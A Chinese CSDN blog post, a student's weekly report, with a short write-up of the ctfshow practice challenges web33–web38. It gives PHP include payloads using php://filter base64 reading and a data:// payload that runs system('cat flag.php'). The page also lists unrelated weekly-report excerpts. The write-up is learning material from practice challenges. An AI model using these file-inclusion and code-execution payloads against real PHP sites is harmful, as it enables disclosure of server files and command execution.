第五周周报

最新推荐文章于 2024-10-05 08:45:32 发布
最新推荐文章于 2024-10-05 08:45:32 发布
阅读量67 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyw260187453/article/details/132124520
版权

ctfshow

1、web33

在这里插入图片描述
过滤这多
不过还可以用include文件包含构造payload来读取flag

?c=include$GET[a]?>&a=flag.php

伪协议读取

?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

进行base64解密
在这里插入图片描述

2、web34

在这里插入图片描述
加了一些过滤发现还可以使用上题思路
payload

?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述
解码
在这里插入图片描述

3、web35和web36

同上题思路依旧可以

4、web37

在这里插入图片描述
可以使用data协议在include函数中执行php代码
在这里插入图片描述
构造payload

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

查看源代码
在这里插入图片描述

5、web38

在这里插入图片描述
因为咱上一题使用的base64加密解密执行的所以上一题的payload依旧可以使用

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

在这里插入图片描述

总结

学到了一些协议读取文件或者执行php代码

Delancey.
关注
贷款违约预测第五周报
zdxy921的博客
10-23 199
已有模型参数调整 上对已有的模型的参数进行了一次调整,有一定效果,这继续对剩余没有调整的参数进行调参。 对subsample和colsample_bytree参数进行调参: 最优参数为subsample:0.7,colsample_bytree:0.8 再对learning_rate和n_estimators两个参数进行调参: learning_rate和n_estimators两个参数跑得比较久,跑了18个小时,最后得到最优参数是learning_rate:0.05,n_estimators
第五周报1
08-08
在数据结构课程设计的第五,何哲宇、耿海直和胡英东三位同学主要集中在模块代码的完善、算法设计以及用户界面的初步构建上。以下是对他们上完成工作和本计划的详细分析。 首先,他们完成了各个关键模块的代码...
第5周报
qq_52538843的博客
12-23 324
学习内容: 1.java 2.啊哈算法 二、啊哈算法 1.队列(先进先出) 1.书上的问题(解码) # include<stdio.h> int main(void) { int a[102] = {0,6,3,1,7,5,8,9,2,4}; int head = 1; int tail = 10; while(head<tail) { printf("%d",a[head]); head++; a[tail] = a[head]; tail++; head+
机器学习第五周报
2301_77762389的博客
05-27 242
首先通过重温之前尝试做的宝可梦和数码宝贝的分类器,复习一下做该分类器的过程,在复习这些过程的同时,来发现之前没考虑到的机器学习的问题,通过数学推导来简要分析部分机器学习的原理,我们发现训练资料数目越大,sample到坏资料的几率就越低,若|H|变小,sample到坏资料的概率也会变低。同时也开始学习了“深度学习新的优化器”这一章节,本通过对比之前学习的一些算法,来发现这些算法的一些不足,然后进一步改进这些算法。
高级实训第五周报
jimmywu123的博客
10-27 481
基本完成了数据预处理与特征选择的部分,并使用KNN和决策树这两个简单的模型达到了接近0.7的评分。本主要从上次课提及的一些内容出发,学习一些更复杂的模型。 随机森林 随机森林是Bagging算法的一个特例,基分类器全部采用决策树。它随机选择一些特征并构建决策树,通过投票等策略综合随机森林中所有树对样本的预测结果,从而得到随机森林的预测结果。这是一种通过引入随机性并综合大量结果来降低方差,缓解单一决策树的过拟合问题的策略。 XGBoost XGBoost是GBDT(梯度提升决策树)的..
第五周报(3.29~4.5)
weixin_45927841的博客
04-05 194
周报 1.数组的地址运算 LOC(i1,i2,…,in)=a+i1m2m3*…mn+i2m3m4…mn+…+in-1*mn+in 2.稀疏矩阵和二维数组的转换 三元数组法 十字链表 3.广义表 求表头 求表尾 求长度 求深度 4.JAVA环境配置 安装JDK 安装IntelliJ IDEA 配置环境变量 5.JAVA学习 java数据类型 运算符 流程控制 选择和循环 ...
创新实训第五周报
hu15144354443的博客
05-29 362
el-dropdown-item @click="deleteTalk(item)">删除对话</el-dropdown-item>// 遍历 talkList 数组,找到对应的对话历史数据项(根据 "talkId" 进行匹配),并更新对应的消息数据为当前的消息列表 this.messages。<el-dropdown-item @click="reTalk(item)">进入对话</el-dropdown-item>// 移除本地存储中的 "talkId" 项,并重置 tid 属性。
SMU Summer 2024 第5周报
qq_39804992的博客
08-10 197
学到了排列组合的逆元写法和Lucas定理。更快,但只能输出结果。可快速预处理出素数表。
java实习第一周报,大学生实习周报
weixin_35719775的博客
03-12 1318
无论学习什么专业,从事什么职业,我们都需要提前实习啦,把理论知识结合起来运用到实践当中去。下面是由出国留学网小编为大家整理的“大学生幼儿园实习周报”,仅供参考,欢迎大家阅读。大学生幼儿园实习周报【一】第一俗话说:万事开头难。刚进园的时候我感到了很大的困难,毫无工作经验的我,应对这些性格迥异的孩子们,我觉得毫无头绪。每一天早上我都会面带微笑和全托、白托的孩子们打招呼,但是由于我是新老师,很...
第一周报
qq_52612197的博客
11-22 2585
第一周报 这是学习前端的第一,发现有好多东西都要慢慢来学习。 1.网页基本结构 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> &l
第五周报0408-20192115641
08-08
这篇周报是关于一个名为“校园导览系统”的项目,该项目由计算机学院的团队成员兰学超、熊瑞东、李培阳等人共同负责。报告主要涵盖了本的工作进展、下的工作计划以及项目的基本需求和限制条件。 在本的工作...
电力设备与新能源行业5月第5周报:异质结量产转换效率刷新最高纪录.pdf
09-12
电力设备与新能源行业5月第5周报聚焦了一个重要的技术突破——异质结量产转换效率刷新了历史最高纪录。这一成就对于整个行业来说具有重大的意义,因为转换效率是衡量太阳能电池性能的关键指标,它直接影响到光伏...
计科-编译原理课程设计-第9组-第5周报1
08-03
在编译原理课程设计中,第9组在第5主要关注了三个核心领域:修复错误(bug)、编写测试代码以及语义分析的学习与设计。这些活动是编译器开发的关键阶段,对于理解和构建一个完整的编译器至关重要。 首先,修复...
第五工作周报1
08-08
在本的工作周报中,7组的核心任务是开始考生管理系统的前端开发。这个系统对于管理和组织各类考试来说至关重要,因为它涉及到考生信息的录入、管理以及考试的顺利进行。目前,前端开发进度已达90%,表明工作推进...
【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议
10-03 1516
在进行网络编程时,有时需要设计并实现自定义协议,以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性:协议应具有清晰的语法和语义,使开发者能快速理解和实现。扩展性:协议应允许未来的功能扩展,而不破坏现有功能。安全性:数据传输过程中应考虑加密和校验,以保证数据不被篡改。高效性:应尽可能减少网络带宽占用,提升数据传输效率。容错性:协议应能处理各种网络异常情况,如数据丢失、重复和延迟。
RCE+[伪协议综合]
2302_81328699的博客
10-03 469
伪协议综合
精品WordPress主题/响应式个人博客主题Kratos
最新发布
2403_86698467的博客
10-05 584
主题设计简约友好,并且支持响应式,自适应访问,简seo单大方的主页构造,使得博客能在臃肿杂乱的环境中脱颖而出,Kratos内置主题设置,可设置seo关键字及站点描述页面伪静态,自定义的顶部样式(背景图 ),
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
Simon223的博客
10-04 992
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
编写一份CAD工程师第十五周报
03-10
5. 继续学习了相关的CAD标准和规范,以提高自己的工作质量。 下工作计划: 1. 继续完成客户的CAD图纸修改需求,并进行测试和验收。 2. 学习并掌握更多的CAD技术和工具,以提高自己的工作效率。 3. 协助同事解决...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值